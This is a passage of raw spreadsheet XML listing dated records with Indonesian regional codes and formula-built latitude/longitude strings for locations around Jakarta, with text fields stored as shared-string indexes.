        <v>3671021007</v>
      </c>
      <c r="N3360">
        <v>3671021</v>
      </c>
      <c r="O3360">
        <v>3671</v>
      </c>
      <c r="P3360">
        <v>36</v>
      </c>
      <c r="Q3360" t="s">
        <v>454</v>
      </c>
      <c r="R3360" t="s">
        <v>454</v>
      </c>
      <c r="S3360" t="s">
        <v>201</v>
      </c>
      <c r="T3360" t="s">
        <v>171</v>
      </c>
      <c r="U3360" s="5">
        <v>10669525</v>
      </c>
      <c r="V3360" s="5" t="s">
        <v>17476</v>
      </c>
      <c r="W3360" s="5">
        <v>-621729</v>
      </c>
      <c r="X3360" t="s">
        <v>21212</v>
      </c>
      <c r="Y3360" t="str">
        <f t="shared" si="52"/>
        <v>-6.21729,106.69525</v>
      </c>
    </row>
    <row r="3361" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3361">
        <v>260450</v>
      </c>
      <c r="B3361" s="1">
        <v>44247</v>
      </c>
      <c r="C3361" s="2">
        <v>0.20829861111111111</v>
      </c>
      <c r="D3361" t="s">
        <v>22</v>
      </c>
      <c r="E3361" t="s">
        <v>23</v>
      </c>
      <c r="F3361" t="s">
        <v>11197</v>
      </c>
      <c r="H3361" t="s">
        <v>26</v>
      </c>
      <c r="I3361" t="s">
        <v>555</v>
      </c>
      <c r="J3361" t="s">
        <v>2627</v>
      </c>
      <c r="L3361" t="s">
        <v>11198</v>
      </c>
      <c r="M3361">
        <v>3275010009</v>
      </c>
      <c r="N3361">
        <v>3275010</v>
      </c>
      <c r="O3361">
        <v>3275</v>
      </c>
      <c r="P3361">
        <v>32</v>
      </c>
      <c r="Q3361" t="s">
        <v>2444</v>
      </c>
      <c r="R3361" t="s">
        <v>287</v>
      </c>
      <c r="S3361" t="s">
        <v>41</v>
      </c>
      <c r="T3361" t="s">
        <v>42</v>
      </c>
      <c r="U3361" s="5">
        <v>10690924</v>
      </c>
      <c r="V3361" s="5" t="s">
        <v>15680</v>
      </c>
      <c r="W3361" s="5">
        <v>-628165</v>
      </c>
      <c r="X3361" t="s">
        <v>21213</v>
      </c>
      <c r="Y3361" t="str">
        <f t="shared" si="52"/>
        <v>-6.28165,106.90924</v>
      </c>
    </row>
    <row r="3362" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3362">
        <v>260451</v>
      </c>
      <c r="B3362" s="1">
        <v>44247</v>
      </c>
      <c r="C3362" s="2">
        <v>0.20835648148148148</v>
      </c>
      <c r="D3362" t="s">
        <v>22</v>
      </c>
      <c r="E3362" t="s">
        <v>23</v>
      </c>
      <c r="F3362" t="s">
        <v>11199</v>
      </c>
      <c r="H3362" t="s">
        <v>26</v>
      </c>
      <c r="I3362" t="s">
        <v>1683</v>
      </c>
      <c r="J3362" t="s">
        <v>3135</v>
      </c>
      <c r="L3362" t="s">
        <v>11200</v>
      </c>
      <c r="M3362">
        <v>3674060003</v>
      </c>
      <c r="N3362">
        <v>3674060</v>
      </c>
      <c r="O3362">
        <v>3674</v>
      </c>
      <c r="P3362">
        <v>36</v>
      </c>
      <c r="Q3362" t="s">
        <v>205</v>
      </c>
      <c r="R3362" t="s">
        <v>169</v>
      </c>
      <c r="S3362" t="s">
        <v>170</v>
      </c>
      <c r="T3362" t="s">
        <v>171</v>
      </c>
      <c r="U3362" s="5">
        <v>10669943</v>
      </c>
      <c r="V3362" s="5" t="s">
        <v>17477</v>
      </c>
      <c r="W3362" s="5">
        <v>-625608</v>
      </c>
      <c r="X3362" t="s">
        <v>21214</v>
      </c>
      <c r="Y3362" t="str">
        <f t="shared" si="52"/>
        <v>-6.25608,106.69943</v>
      </c>
    </row>
    <row r="3363" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3363">
        <v>260457</v>
      </c>
      <c r="B3363" s="1">
        <v>44247</v>
      </c>
      <c r="C3363" s="2">
        <v>0.2076388888888889</v>
      </c>
      <c r="D3363" t="s">
        <v>2648</v>
      </c>
      <c r="E3363" t="s">
        <v>23</v>
      </c>
      <c r="G3363" t="s">
        <v>11201</v>
      </c>
      <c r="H3363" t="s">
        <v>26</v>
      </c>
      <c r="J3363" t="s">
        <v>11202</v>
      </c>
      <c r="L3363" t="s">
        <v>11203</v>
      </c>
      <c r="M3363">
        <v>3171020002</v>
      </c>
      <c r="N3363">
        <v>3171020</v>
      </c>
      <c r="O3363">
        <v>3171</v>
      </c>
      <c r="P3363">
        <v>31</v>
      </c>
      <c r="Q3363" t="s">
        <v>1172</v>
      </c>
      <c r="R3363" t="s">
        <v>484</v>
      </c>
      <c r="S3363" t="s">
        <v>108</v>
      </c>
      <c r="T3363" t="s">
        <v>33</v>
      </c>
      <c r="U3363" s="5">
        <v>10682644</v>
      </c>
      <c r="V3363" s="5" t="s">
        <v>17478</v>
      </c>
      <c r="W3363" s="5">
        <v>-628473</v>
      </c>
      <c r="X3363" t="s">
        <v>21215</v>
      </c>
      <c r="Y3363" t="str">
        <f t="shared" si="52"/>
        <v>-6.28473,106.82644</v>
      </c>
    </row>
    <row r="3364" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3364">
        <v>260485</v>
      </c>
      <c r="B3364" s="1">
        <v>44247</v>
      </c>
      <c r="C3364" s="2">
        <v>0.2104398148148148</v>
      </c>
      <c r="D3364" t="s">
        <v>22</v>
      </c>
      <c r="E3364" t="s">
        <v>23</v>
      </c>
      <c r="F3364" t="s">
        <v>11204</v>
      </c>
      <c r="H3364" t="s">
        <v>26</v>
      </c>
      <c r="I3364" t="s">
        <v>774</v>
      </c>
      <c r="J3364" t="s">
        <v>2627</v>
      </c>
      <c r="L3364" t="s">
        <v>11205</v>
      </c>
      <c r="M3364">
        <v>3275020003</v>
      </c>
      <c r="N3364">
        <v>3275020</v>
      </c>
      <c r="O3364">
        <v>3275</v>
      </c>
      <c r="P3364">
        <v>32</v>
      </c>
      <c r="Q3364" t="s">
        <v>4738</v>
      </c>
      <c r="R3364" t="s">
        <v>828</v>
      </c>
      <c r="S3364" t="s">
        <v>41</v>
      </c>
      <c r="T3364" t="s">
        <v>42</v>
      </c>
      <c r="U3364" s="5">
        <v>10697005</v>
      </c>
      <c r="V3364" s="5" t="s">
        <v>17479</v>
      </c>
      <c r="W3364" s="5">
        <v>-630126</v>
      </c>
      <c r="X3364" t="s">
        <v>21216</v>
      </c>
      <c r="Y3364" t="str">
        <f t="shared" si="52"/>
        <v>-6.30126,106.97005</v>
      </c>
    </row>
    <row r="3365" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3365">
        <v>260486</v>
      </c>
      <c r="B3365" s="1">
        <v>44247</v>
      </c>
      <c r="C3365" s="2">
        <v>0.21053240740740742</v>
      </c>
      <c r="D3365" t="s">
        <v>22</v>
      </c>
      <c r="E3365" t="s">
        <v>23</v>
      </c>
      <c r="F3365" t="s">
        <v>11206</v>
      </c>
      <c r="G3365" t="s">
        <v>11207</v>
      </c>
      <c r="H3365" t="s">
        <v>26</v>
      </c>
      <c r="I3365" t="s">
        <v>2395</v>
      </c>
      <c r="J3365" t="s">
        <v>2627</v>
      </c>
      <c r="L3365" t="s">
        <v>11208</v>
      </c>
      <c r="M3365">
        <v>3216022006</v>
      </c>
      <c r="N3365">
        <v>3216022</v>
      </c>
      <c r="O3365">
        <v>3216</v>
      </c>
      <c r="P3365">
        <v>32</v>
      </c>
      <c r="Q3365" t="s">
        <v>11209</v>
      </c>
      <c r="R3365" t="s">
        <v>9842</v>
      </c>
      <c r="S3365" t="s">
        <v>41</v>
      </c>
      <c r="T3365" t="s">
        <v>42</v>
      </c>
      <c r="U3365" s="5">
        <v>10716558</v>
      </c>
      <c r="V3365" s="5" t="s">
        <v>17480</v>
      </c>
      <c r="W3365" s="5">
        <v>-631102</v>
      </c>
      <c r="X3365" t="s">
        <v>21217</v>
      </c>
      <c r="Y3365" t="str">
        <f t="shared" si="52"/>
        <v>-6.31102,107.16558</v>
      </c>
    </row>
    <row r="3366" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3366">
        <v>260487</v>
      </c>
      <c r="B3366" s="1">
        <v>44247</v>
      </c>
      <c r="C3366" s="2">
        <v>0.21237268518518518</v>
      </c>
      <c r="D3366" t="s">
        <v>22</v>
      </c>
      <c r="E3366" t="s">
        <v>23</v>
      </c>
      <c r="F3366" t="s">
        <v>11210</v>
      </c>
      <c r="G3366" t="s">
        <v>11211</v>
      </c>
      <c r="H3366" t="s">
        <v>26</v>
      </c>
      <c r="I3366" t="s">
        <v>8427</v>
      </c>
      <c r="J3366" t="s">
        <v>11212</v>
      </c>
      <c r="L3366" t="s">
        <v>11213</v>
      </c>
      <c r="M3366">
        <v>3172040004</v>
      </c>
      <c r="N3366">
        <v>3172040</v>
      </c>
      <c r="O3366">
        <v>3172</v>
      </c>
      <c r="P3366">
        <v>31</v>
      </c>
      <c r="Q3366" t="s">
        <v>280</v>
      </c>
      <c r="R3366" t="s">
        <v>281</v>
      </c>
      <c r="S3366" t="s">
        <v>49</v>
      </c>
      <c r="T3366" t="s">
        <v>33</v>
      </c>
      <c r="U3366" s="5">
        <v>10689695</v>
      </c>
      <c r="V3366" s="5" t="s">
        <v>17481</v>
      </c>
      <c r="W3366" s="5">
        <v>-624669</v>
      </c>
      <c r="X3366" t="s">
        <v>21218</v>
      </c>
      <c r="Y3366" t="str">
        <f t="shared" si="52"/>
        <v>-6.24669,106.89695</v>
      </c>
    </row>
    <row r="3367" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3367">
        <v>260521</v>
      </c>
      <c r="B3367" s="1">
        <v>44247</v>
      </c>
      <c r="C3367" s="2">
        <v>0.2131828703703704</v>
      </c>
      <c r="D3367" t="s">
        <v>22</v>
      </c>
      <c r="E3367" t="s">
        <v>23</v>
      </c>
      <c r="F3367" t="s">
        <v>11214</v>
      </c>
      <c r="H3367" t="s">
        <v>26</v>
      </c>
      <c r="I3367" t="s">
        <v>197</v>
      </c>
      <c r="J3367" t="s">
        <v>11215</v>
      </c>
      <c r="L3367" t="s">
        <v>11216</v>
      </c>
      <c r="M3367">
        <v>3172040004</v>
      </c>
      <c r="N3367">
        <v>3172040</v>
      </c>
      <c r="O3367">
        <v>3172</v>
      </c>
      <c r="P3367">
        <v>31</v>
      </c>
      <c r="Q3367" t="s">
        <v>280</v>
      </c>
      <c r="R3367" t="s">
        <v>281</v>
      </c>
      <c r="S3367" t="s">
        <v>49</v>
      </c>
      <c r="T3367" t="s">
        <v>33</v>
      </c>
      <c r="U3367" s="5">
        <v>10690758</v>
      </c>
      <c r="V3367" s="5" t="s">
        <v>17482</v>
      </c>
      <c r="W3367" s="5">
        <v>-628420</v>
      </c>
      <c r="X3367" t="s">
        <v>21219</v>
      </c>
      <c r="Y3367" t="str">
        <f t="shared" si="52"/>
        <v>-6.28420,106.90758</v>
      </c>
    </row>
    <row r="3368" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3368">
        <v>260522</v>
      </c>
      <c r="B3368" s="1">
        <v>44247</v>
      </c>
      <c r="C3368" s="2">
        <v>0.21398148148148147</v>
      </c>
      <c r="D3368" t="s">
        <v>22</v>
      </c>
      <c r="E3368" t="s">
        <v>23</v>
      </c>
      <c r="F3368" t="s">
        <v>11217</v>
      </c>
      <c r="H3368" t="s">
        <v>26</v>
      </c>
      <c r="I3368" t="s">
        <v>3668</v>
      </c>
      <c r="J3368" t="s">
        <v>2627</v>
      </c>
      <c r="L3368" t="s">
        <v>11218</v>
      </c>
      <c r="M3368">
        <v>3216082001</v>
      </c>
      <c r="N3368">
        <v>3216082</v>
      </c>
      <c r="O3368">
        <v>3216</v>
      </c>
      <c r="P3368">
        <v>32</v>
      </c>
      <c r="Q3368" t="s">
        <v>600</v>
      </c>
      <c r="R3368" t="s">
        <v>601</v>
      </c>
      <c r="S3368" t="s">
        <v>41</v>
      </c>
      <c r="T3368" t="s">
        <v>42</v>
      </c>
      <c r="U3368" s="5">
        <v>10704890</v>
      </c>
      <c r="V3368" s="5" t="s">
        <v>17483</v>
      </c>
      <c r="W3368" s="5">
        <v>-623321</v>
      </c>
      <c r="X3368" t="s">
        <v>21220</v>
      </c>
      <c r="Y3368" t="str">
        <f t="shared" si="52"/>
        <v>-6.23321,107.04890</v>
      </c>
    </row>
    <row r="3369" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3369">
        <v>260523</v>
      </c>
      <c r="B3369" s="1">
        <v>44247</v>
      </c>
      <c r="C3369" s="2">
        <v>0.21503472222222222</v>
      </c>
      <c r="D3369" t="s">
        <v>22</v>
      </c>
      <c r="E3369" t="s">
        <v>23</v>
      </c>
      <c r="F3369" t="s">
        <v>11219</v>
      </c>
      <c r="G3369" t="s">
        <v>11220</v>
      </c>
      <c r="H3369" t="s">
        <v>26</v>
      </c>
      <c r="I3369" t="s">
        <v>1005</v>
      </c>
      <c r="J3369" t="s">
        <v>3135</v>
      </c>
      <c r="L3369" t="s">
        <v>11221</v>
      </c>
      <c r="M3369">
        <v>3671011002</v>
      </c>
      <c r="N3369">
        <v>3671011</v>
      </c>
      <c r="O3369">
        <v>3671</v>
      </c>
      <c r="P3369">
        <v>36</v>
      </c>
      <c r="Q3369" t="s">
        <v>5166</v>
      </c>
      <c r="R3369" t="s">
        <v>701</v>
      </c>
      <c r="S3369" t="s">
        <v>201</v>
      </c>
      <c r="T3369" t="s">
        <v>171</v>
      </c>
      <c r="U3369" s="5">
        <v>10673102</v>
      </c>
      <c r="V3369" s="5" t="s">
        <v>17484</v>
      </c>
      <c r="W3369" s="5">
        <v>-623551</v>
      </c>
      <c r="X3369" t="s">
        <v>21221</v>
      </c>
      <c r="Y3369" t="str">
        <f t="shared" si="52"/>
        <v>-6.23551,106.73102</v>
      </c>
    </row>
    <row r="3370" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3370">
        <v>260524</v>
      </c>
      <c r="B3370" s="1">
        <v>44247</v>
      </c>
      <c r="C3370" s="2">
        <v>0.21494212962962964</v>
      </c>
      <c r="D3370" t="s">
        <v>22</v>
      </c>
      <c r="E3370" t="s">
        <v>23</v>
      </c>
      <c r="F3370" t="s">
        <v>11222</v>
      </c>
      <c r="G3370" t="s">
        <v>11223</v>
      </c>
      <c r="H3370" t="s">
        <v>26</v>
      </c>
      <c r="I3370" t="s">
        <v>166</v>
      </c>
      <c r="J3370" t="s">
        <v>2627</v>
      </c>
      <c r="L3370" t="s">
        <v>11224</v>
      </c>
      <c r="M3370">
        <v>3275010011</v>
      </c>
      <c r="N3370">
        <v>3275010</v>
      </c>
      <c r="O3370">
        <v>3275</v>
      </c>
      <c r="P3370">
        <v>32</v>
      </c>
      <c r="Q3370" t="s">
        <v>2389</v>
      </c>
      <c r="R3370" t="s">
        <v>287</v>
      </c>
      <c r="S3370" t="s">
        <v>41</v>
      </c>
      <c r="T3370" t="s">
        <v>42</v>
      </c>
      <c r="U3370" s="5">
        <v>10692132</v>
      </c>
      <c r="V3370" s="5" t="s">
        <v>17485</v>
      </c>
      <c r="W3370" s="5">
        <v>-626234</v>
      </c>
      <c r="X3370" t="s">
        <v>21222</v>
      </c>
      <c r="Y3370" t="str">
        <f t="shared" si="52"/>
        <v>-6.26234,106.92132</v>
      </c>
    </row>
    <row r="3371" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3371">
        <v>260526</v>
      </c>
      <c r="B3371" s="1">
        <v>44247</v>
      </c>
      <c r="C3371" s="2">
        <v>0.21582175925925925</v>
      </c>
      <c r="D3371" t="s">
        <v>22</v>
      </c>
      <c r="E3371" t="s">
        <v>23</v>
      </c>
      <c r="F3371" t="s">
        <v>11225</v>
      </c>
      <c r="G3371" t="s">
        <v>11226</v>
      </c>
      <c r="H3371" t="s">
        <v>26</v>
      </c>
      <c r="I3371" t="s">
        <v>11227</v>
      </c>
      <c r="J3371" t="s">
        <v>2627</v>
      </c>
      <c r="L3371" t="s">
        <v>11228</v>
      </c>
      <c r="M3371">
        <v>3216081007</v>
      </c>
      <c r="N3371">
        <v>3216081</v>
      </c>
      <c r="O3371">
        <v>3216</v>
      </c>
      <c r="P3371">
        <v>32</v>
      </c>
      <c r="Q3371" t="s">
        <v>7146</v>
      </c>
      <c r="R3371" t="s">
        <v>2512</v>
      </c>
      <c r="S3371" t="s">
        <v>41</v>
      </c>
      <c r="T3371" t="s">
        <v>42</v>
      </c>
      <c r="U3371" s="5">
        <v>10705351</v>
      </c>
      <c r="V3371" s="5" t="s">
        <v>17486</v>
      </c>
      <c r="W3371" s="5">
        <v>-625676</v>
      </c>
      <c r="X3371" t="s">
        <v>21223</v>
      </c>
      <c r="Y3371" t="str">
        <f t="shared" si="52"/>
        <v>-6.25676,107.05351</v>
      </c>
    </row>
    <row r="3372" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3372">
        <v>260527</v>
      </c>
      <c r="B3372" s="1">
        <v>44247</v>
      </c>
      <c r="C3372" s="2">
        <v>0.21626157407407409</v>
      </c>
      <c r="D3372" t="s">
        <v>22</v>
      </c>
      <c r="E3372" t="s">
        <v>23</v>
      </c>
      <c r="F3372" t="s">
        <v>11229</v>
      </c>
      <c r="G3372" t="s">
        <v>11230</v>
      </c>
      <c r="H3372" t="s">
        <v>26</v>
      </c>
      <c r="I3372" t="s">
        <v>11231</v>
      </c>
      <c r="J3372" t="s">
        <v>11232</v>
      </c>
      <c r="L3372" t="s">
        <v>11233</v>
      </c>
      <c r="M3372">
        <v>3171020007</v>
      </c>
      <c r="N3372">
        <v>3171020</v>
      </c>
      <c r="O3372">
        <v>3171</v>
      </c>
      <c r="P3372">
        <v>31</v>
      </c>
      <c r="Q3372" t="s">
        <v>5778</v>
      </c>
      <c r="R3372" t="s">
        <v>484</v>
      </c>
      <c r="S3372" t="s">
        <v>108</v>
      </c>
      <c r="T3372" t="s">
        <v>33</v>
      </c>
      <c r="U3372" s="5">
        <v>10684715</v>
      </c>
      <c r="V3372" s="5" t="s">
        <v>17487</v>
      </c>
      <c r="W3372" s="5">
        <v>-628379</v>
      </c>
      <c r="X3372" t="s">
        <v>21224</v>
      </c>
      <c r="Y3372" t="str">
        <f t="shared" si="52"/>
        <v>-6.28379,106.84715</v>
      </c>
    </row>
    <row r="3373" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3373">
        <v>260528</v>
      </c>
      <c r="B3373" s="1">
        <v>44247</v>
      </c>
      <c r="C3373" s="2">
        <v>0.20037037037037039</v>
      </c>
      <c r="D3373" t="s">
        <v>85</v>
      </c>
      <c r="E3373" t="s">
        <v>23</v>
      </c>
      <c r="F3373" t="s">
        <v>11234</v>
      </c>
      <c r="G3373" t="s">
        <v>11235</v>
      </c>
      <c r="H3373" t="s">
        <v>26</v>
      </c>
      <c r="J3373" t="s">
        <v>2627</v>
      </c>
      <c r="K3373" t="s">
        <v>11236</v>
      </c>
      <c r="L3373" t="s">
        <v>11237</v>
      </c>
      <c r="M3373">
        <v>3275041001</v>
      </c>
      <c r="N3373">
        <v>3275041</v>
      </c>
      <c r="O3373">
        <v>3275</v>
      </c>
      <c r="P3373">
        <v>32</v>
      </c>
      <c r="Q3373" t="s">
        <v>11238</v>
      </c>
      <c r="R3373" t="s">
        <v>134</v>
      </c>
      <c r="S3373" t="s">
        <v>41</v>
      </c>
      <c r="T3373" t="s">
        <v>42</v>
      </c>
      <c r="U3373" s="5">
        <v>10698675</v>
      </c>
      <c r="V3373" s="5" t="s">
        <v>17488</v>
      </c>
      <c r="W3373" s="5">
        <v>-629550</v>
      </c>
      <c r="X3373" t="s">
        <v>21225</v>
      </c>
      <c r="Y3373" t="str">
        <f t="shared" si="52"/>
        <v>-6.29550,106.98675</v>
      </c>
    </row>
    <row r="3374" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3374">
        <v>260562</v>
      </c>
      <c r="B3374" s="1">
        <v>44247</v>
      </c>
      <c r="C3374" s="2">
        <v>0.21869212962962961</v>
      </c>
      <c r="D3374" t="s">
        <v>22</v>
      </c>
      <c r="E3374" t="s">
        <v>23</v>
      </c>
      <c r="F3374" t="s">
        <v>11239</v>
      </c>
      <c r="G3374" t="s">
        <v>11240</v>
      </c>
      <c r="H3374" t="s">
        <v>26</v>
      </c>
      <c r="I3374" t="s">
        <v>11241</v>
      </c>
      <c r="J3374" t="s">
        <v>2627</v>
      </c>
      <c r="L3374" t="s">
        <v>11242</v>
      </c>
      <c r="M3374">
        <v>3201181009</v>
      </c>
      <c r="N3374">
        <v>3201181</v>
      </c>
      <c r="O3374">
        <v>3201</v>
      </c>
      <c r="P3374">
        <v>32</v>
      </c>
      <c r="Q3374" t="s">
        <v>9352</v>
      </c>
      <c r="R3374" t="s">
        <v>11243</v>
      </c>
      <c r="S3374" t="s">
        <v>421</v>
      </c>
      <c r="T3374" t="s">
        <v>42</v>
      </c>
      <c r="U3374" s="5">
        <v>10698289</v>
      </c>
      <c r="V3374" s="5" t="s">
        <v>17489</v>
      </c>
      <c r="W3374" s="5">
        <v>-644028</v>
      </c>
      <c r="X3374" t="s">
        <v>21226</v>
      </c>
      <c r="Y3374" t="str">
        <f t="shared" si="52"/>
        <v>-6.44028,106.98289</v>
      </c>
    </row>
    <row r="3375" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3375">
        <v>260596</v>
      </c>
      <c r="B3375" s="1">
        <v>44247</v>
      </c>
      <c r="C3375" s="2">
        <v>0.22027777777777779</v>
      </c>
      <c r="D3375" t="s">
        <v>22</v>
      </c>
      <c r="E3375" t="s">
        <v>23</v>
      </c>
      <c r="F3375" t="s">
        <v>11244</v>
      </c>
      <c r="H3375" t="s">
        <v>26</v>
      </c>
      <c r="I3375" t="s">
        <v>1046</v>
      </c>
      <c r="J3375" t="s">
        <v>5608</v>
      </c>
      <c r="L3375" t="s">
        <v>11245</v>
      </c>
      <c r="M3375">
        <v>3172030002</v>
      </c>
      <c r="N3375">
        <v>3172030</v>
      </c>
      <c r="O3375">
        <v>3172</v>
      </c>
      <c r="P3375">
        <v>31</v>
      </c>
      <c r="Q3375" t="s">
        <v>1534</v>
      </c>
      <c r="R3375" t="s">
        <v>228</v>
      </c>
      <c r="S3375" t="s">
        <v>49</v>
      </c>
      <c r="T3375" t="s">
        <v>33</v>
      </c>
      <c r="U3375" s="5">
        <v>10690171</v>
      </c>
      <c r="V3375" s="5" t="s">
        <v>17490</v>
      </c>
      <c r="W3375" s="5">
        <v>-633175</v>
      </c>
      <c r="X3375" t="s">
        <v>21227</v>
      </c>
      <c r="Y3375" t="str">
        <f t="shared" si="52"/>
        <v>-6.33175,106.90171</v>
      </c>
    </row>
    <row r="3376" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3376">
        <v>260598</v>
      </c>
      <c r="B3376" s="1">
        <v>44247</v>
      </c>
      <c r="C3376" s="2">
        <v>0.2209953703703704</v>
      </c>
      <c r="D3376" t="s">
        <v>22</v>
      </c>
      <c r="E3376" t="s">
        <v>23</v>
      </c>
      <c r="F3376" t="s">
        <v>11246</v>
      </c>
      <c r="H3376" t="s">
        <v>26</v>
      </c>
      <c r="I3376" t="s">
        <v>11247</v>
      </c>
      <c r="J3376" t="s">
        <v>5280</v>
      </c>
      <c r="L3376" t="s">
        <v>11248</v>
      </c>
      <c r="M3376">
        <v>3171060004</v>
      </c>
      <c r="N3376">
        <v>3171060</v>
      </c>
      <c r="O3376">
        <v>3171</v>
      </c>
      <c r="P3376">
        <v>31</v>
      </c>
      <c r="Q3376" t="s">
        <v>5027</v>
      </c>
      <c r="R3376" t="s">
        <v>1236</v>
      </c>
      <c r="S3376" t="s">
        <v>108</v>
      </c>
      <c r="T3376" t="s">
        <v>33</v>
      </c>
      <c r="U3376" s="5">
        <v>10681444</v>
      </c>
      <c r="V3376" s="5" t="s">
        <v>17491</v>
      </c>
      <c r="W3376" s="5">
        <v>-624419</v>
      </c>
      <c r="X3376" t="s">
        <v>21228</v>
      </c>
      <c r="Y3376" t="str">
        <f t="shared" si="52"/>
        <v>-6.24419,106.81444</v>
      </c>
    </row>
    <row r="3377" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3377">
        <v>260665</v>
      </c>
      <c r="B3377" s="1">
        <v>44247</v>
      </c>
      <c r="C3377" s="2">
        <v>0.22684027777777779</v>
      </c>
      <c r="D3377" t="s">
        <v>22</v>
      </c>
      <c r="E3377" t="s">
        <v>23</v>
      </c>
      <c r="F3377" t="s">
        <v>11249</v>
      </c>
      <c r="G3377" t="s">
        <v>11250</v>
      </c>
      <c r="H3377" t="s">
        <v>26</v>
      </c>
      <c r="I3377" t="s">
        <v>965</v>
      </c>
      <c r="J3377" t="s">
        <v>2627</v>
      </c>
      <c r="L3377" t="s">
        <v>11251</v>
      </c>
      <c r="M3377">
        <v>3275010008</v>
      </c>
      <c r="N3377">
        <v>3275010</v>
      </c>
      <c r="O3377">
        <v>3275</v>
      </c>
      <c r="P3377">
        <v>32</v>
      </c>
      <c r="Q3377" t="s">
        <v>2236</v>
      </c>
      <c r="R3377" t="s">
        <v>287</v>
      </c>
      <c r="S3377" t="s">
        <v>41</v>
      </c>
      <c r="T3377" t="s">
        <v>42</v>
      </c>
      <c r="U3377" s="5">
        <v>10693723</v>
      </c>
      <c r="V3377" s="5" t="s">
        <v>17492</v>
      </c>
      <c r="W3377" s="5">
        <v>-628194</v>
      </c>
      <c r="X3377" t="s">
        <v>21229</v>
      </c>
      <c r="Y3377" t="str">
        <f t="shared" si="52"/>
        <v>-6.28194,106.93723</v>
      </c>
    </row>
    <row r="3378" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3378">
        <v>260699</v>
      </c>
      <c r="B3378" s="1">
        <v>44247</v>
      </c>
      <c r="C3378" s="2">
        <v>0.23038194444444446</v>
      </c>
      <c r="D3378" t="s">
        <v>22</v>
      </c>
      <c r="E3378" t="s">
        <v>23</v>
      </c>
      <c r="F3378" t="s">
        <v>11252</v>
      </c>
      <c r="G3378" t="s">
        <v>11253</v>
      </c>
      <c r="H3378" t="s">
        <v>26</v>
      </c>
      <c r="I3378" t="s">
        <v>11254</v>
      </c>
      <c r="J3378" t="s">
        <v>4994</v>
      </c>
      <c r="L3378" t="s">
        <v>11255</v>
      </c>
      <c r="M3378">
        <v>3171080003</v>
      </c>
      <c r="N3378">
        <v>3171080</v>
      </c>
      <c r="O3378">
        <v>3171</v>
      </c>
      <c r="P3378">
        <v>31</v>
      </c>
      <c r="Q3378" t="s">
        <v>3677</v>
      </c>
      <c r="R3378" t="s">
        <v>1403</v>
      </c>
      <c r="S3378" t="s">
        <v>108</v>
      </c>
      <c r="T3378" t="s">
        <v>33</v>
      </c>
      <c r="U3378" s="5">
        <v>10682436</v>
      </c>
      <c r="V3378" s="5" t="s">
        <v>15719</v>
      </c>
      <c r="W3378" s="5">
        <v>-625447</v>
      </c>
      <c r="X3378" t="s">
        <v>21230</v>
      </c>
      <c r="Y3378" t="str">
        <f t="shared" si="52"/>
        <v>-6.25447,106.82436</v>
      </c>
    </row>
    <row r="3379" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3379">
        <v>260700</v>
      </c>
      <c r="B3379" s="1">
        <v>44247</v>
      </c>
      <c r="C3379" s="2">
        <v>0.23124999999999998</v>
      </c>
      <c r="D3379" t="s">
        <v>2648</v>
      </c>
      <c r="E3379" t="s">
        <v>23</v>
      </c>
      <c r="G3379" t="s">
        <v>11256</v>
      </c>
      <c r="H3379" t="s">
        <v>26</v>
      </c>
      <c r="I3379" t="s">
        <v>103</v>
      </c>
      <c r="J3379" t="s">
        <v>793</v>
      </c>
      <c r="L3379" t="s">
        <v>11257</v>
      </c>
      <c r="M3379">
        <v>3175010002</v>
      </c>
      <c r="N3379">
        <v>3175010</v>
      </c>
      <c r="O3379">
        <v>3175</v>
      </c>
      <c r="P3379">
        <v>31</v>
      </c>
      <c r="Q3379" t="s">
        <v>616</v>
      </c>
      <c r="R3379" t="s">
        <v>546</v>
      </c>
      <c r="S3379" t="s">
        <v>547</v>
      </c>
      <c r="T3379" t="s">
        <v>33</v>
      </c>
      <c r="U3379" s="5">
        <v>10677354</v>
      </c>
      <c r="V3379" s="5" t="s">
        <v>17493</v>
      </c>
      <c r="W3379" s="5">
        <v>-613846</v>
      </c>
      <c r="X3379" t="s">
        <v>21231</v>
      </c>
      <c r="Y3379" t="str">
        <f t="shared" si="52"/>
        <v>-6.13846,106.77354</v>
      </c>
    </row>
    <row r="3380" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3380">
        <v>260734</v>
      </c>
      <c r="B3380" s="1">
        <v>44247</v>
      </c>
      <c r="C3380" s="2">
        <v>0.23552083333333332</v>
      </c>
      <c r="D3380" t="s">
        <v>22</v>
      </c>
      <c r="E3380" t="s">
        <v>23</v>
      </c>
      <c r="F3380" t="s">
        <v>11258</v>
      </c>
      <c r="G3380" t="s">
        <v>11259</v>
      </c>
      <c r="H3380" t="s">
        <v>26</v>
      </c>
      <c r="I3380" t="s">
        <v>11260</v>
      </c>
      <c r="J3380" t="s">
        <v>3135</v>
      </c>
      <c r="L3380" t="s">
        <v>11261</v>
      </c>
      <c r="M3380">
        <v>3671010001</v>
      </c>
      <c r="N3380">
        <v>3671010</v>
      </c>
      <c r="O3380">
        <v>3671</v>
      </c>
      <c r="P3380">
        <v>36</v>
      </c>
      <c r="Q3380" t="s">
        <v>4656</v>
      </c>
      <c r="R3380" t="s">
        <v>200</v>
      </c>
      <c r="S3380" t="s">
        <v>201</v>
      </c>
      <c r="T3380" t="s">
        <v>171</v>
      </c>
      <c r="U3380" s="5">
        <v>10669635</v>
      </c>
      <c r="V3380" s="5" t="s">
        <v>17494</v>
      </c>
      <c r="W3380" s="5">
        <v>-623290</v>
      </c>
      <c r="X3380" t="s">
        <v>21232</v>
      </c>
      <c r="Y3380" t="str">
        <f t="shared" si="52"/>
        <v>-6.23290,106.69635</v>
      </c>
    </row>
